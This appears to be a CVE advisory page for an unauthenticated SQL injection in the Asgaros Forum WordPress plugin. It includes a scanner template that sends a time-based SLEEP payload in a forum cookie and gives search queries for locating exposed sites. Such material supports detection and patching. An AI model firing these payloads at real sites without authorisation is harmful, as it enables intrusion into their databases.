CVE-2025-11452: Asgaros Forum < 3.2.0 - SQL Injection
2026-09-28UnknownPoC Public
Description
Asgaros Forum for WordPress versions prior to 3.2.0 is vulnerable to unauthenticated SQL injection through the asgarosforum_unread_exclude cookie. The cookie is JSON-decoded and its object keys are imploded into a NOT IN() clause without sanitisation. The vulnerable query only runs while rendering the forum page, so the payload must be sent there rather than to the site root.
PoC
id: CVE-2025-11452
info:
name: Asgaros Forum < 3.2.0 - SQL Injection
author: Pauullamm
severity: high
description: |
Asgaros Forum for WordPress versions prior to 3.2.0 is vulnerable to unauthenticated SQL injection through the asgarosforum_unread_exclude cookie. The cookie is JSON-decoded and its object keys are imploded into a NOT IN() clause without sanitisation. The vulnerable query only runs while rendering the forum page, so the payload must be sent there rather than to the site root.
impact: |
Unauthenticated attackers can execute arbitrary SQL against the WordPress database.
remediation: |
Update Asgaros Forum to 3.2.0 or later.
reference:
- https://wpscan.com/vulnerability/e89f1f31-dc70-4ea5-b389-81c8be5b10c6/
- https://plugins.trac.wordpress.org/browser/asgaros-forum/trunk/includes/forum-unread.php
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11452
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-11452
epss-score: 0.01217
epss-percentile: 0.67392
cwe-id: CWE-89
metadata:
verified: true
max-request: 5
vendor: asgaros
product: asgaros-forum
framework: wordpress
shodan-query: html:"/wp-content/plugins/asgaros-forum"
fofa-query: body="/wp-content/plugins/asgaros-forum"
tags: cve,cve2025,wordpress,wp-plugin,asgaros-forum,sqli
http:
- method: GET
path:
- "{{BaseURL}}/forum/"
- "{{BaseURL}}/forums/"
- "{{BaseURL}}/community/"
- "{{BaseURL}}/board/"
- "{{BaseURL}}/"
headers:
Cookie: 'asgarosforum_unread_exclude={"(SELECT(0)FROM(SELECT(SLEEP(7)))a)":1}'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<body\b[^>]*\bclass=["''][^"'']*\basgaros-forum\b[^"'']*["'']'
- type: dsl
dsl:
- 'duration >= 7'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100ecff775eb87cfcc1f5541d9b6d8d5281befd2ebff32421092d6cfd2fbf958c26022100f993b73b0c3f8c04bf54a703798e77c83b6758648ae5af683338c5a023e25d80:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.